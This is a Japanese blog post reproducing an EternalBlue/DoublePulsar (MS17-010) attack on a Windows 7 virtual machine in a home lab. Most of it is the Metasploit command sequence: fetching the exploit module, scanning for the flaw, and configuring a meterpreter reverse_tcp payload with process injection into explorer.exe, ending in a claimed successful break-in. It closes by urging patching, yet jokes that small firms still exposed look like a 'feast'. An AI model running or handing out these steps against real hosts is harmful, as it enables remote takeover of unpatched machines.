とある親父の侵入実験【MS17-010の活用】
今更なんだけど最近話題のWannaCryptが利用していることでお馴染みの脆弱性「MS17-010」を利用した攻撃というものを検証してみたいと思う。
本脆弱性に関する細かいことは以下のリンクを参照してください。
マイクロソフト セキュリティ情報 MS17-010 - 緊急
今回は、この動画を参考にしています。
準備したもの
環境(仮想環境)
1 環境構築
この動画によると、まず、wineをインストールする。
root@kl-01rbt:~# apt-get update
root@kl-01rbt:~# apt-get install wine32
我が家の環境では、既にインストールされていた様子
次に脆弱性を利用する攻撃モジュールをゲットしてくる。
root@kl-01rbt:~# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
落としてきたやつの「deps」と「eternalblue_doublepulsar.rb」を/usr/share/metasploit-framework/modules/exploits/windows/smbにコピーする。この作業は動画のようにGUIでやったほうが簡単かも
2 調査
次に対象となるWindows 7がSMBv1を使っているのかを調査する。
調査用のモジュールは最近のアップデートで組み込まれている様子。
msf > search ms17-010
これでDBを探すと「auxiliary/scanner/smb/smb_ms17_010」という名前の「MS17-010 SMB RCE Detection」をしてくれるモジュールが見つかるので実行
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf auxiliary(smb_ms17_010) > run
調査の結果としては、MS17-010の脆弱性があって何か出来そうな雰囲気を醸し出してくれるw
3 攻撃準備
モジュールを配置したらmetasploitの起動
root@kl-01rbt:~# msfconsole
起動したら
msf > search eternalblue
さっき入れたモジュールが見つかったらいつものように設定していく。今回はやたら設定項目長い・・・。
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
DOUBLEPULSARPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
ETERNALBLUEPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
msf exploit(eternalblue_doublepulsar) > set target 9
target => 9
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.150
RHOST => 192.168.1.150
msf exploit(eternalblue_doublepulsar) > set WINEPATH /root/
WINEPATH => WINEPATH /root/
msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
TARGETARCHITECTURE => x86
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
PROCESSINJECT => explorer.exe
msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
4 攻撃
これを実行してやると・・・
見事に侵入成功w
5 結論
この脆弱性自体、3月のアップデートで修正されているんだけど、今回のランサムウェア騒ぎでは適応していなかった(若しくは何かしらの理由で適応できない)環境の端末が感染して大変なことになった。やはり、パッチは公開されたら適用するべきだと思うし、もし何かしらの理由で適用ができないならばしっかりと代替手段を講じるべきだと思う。
ま、ペネトレ仕掛ける側とすると、こんなメジャー級の脆弱性が残ってる中小企業さんとか見つけちゃうと可哀想(ご馳走)に思えちゃうんだけどねw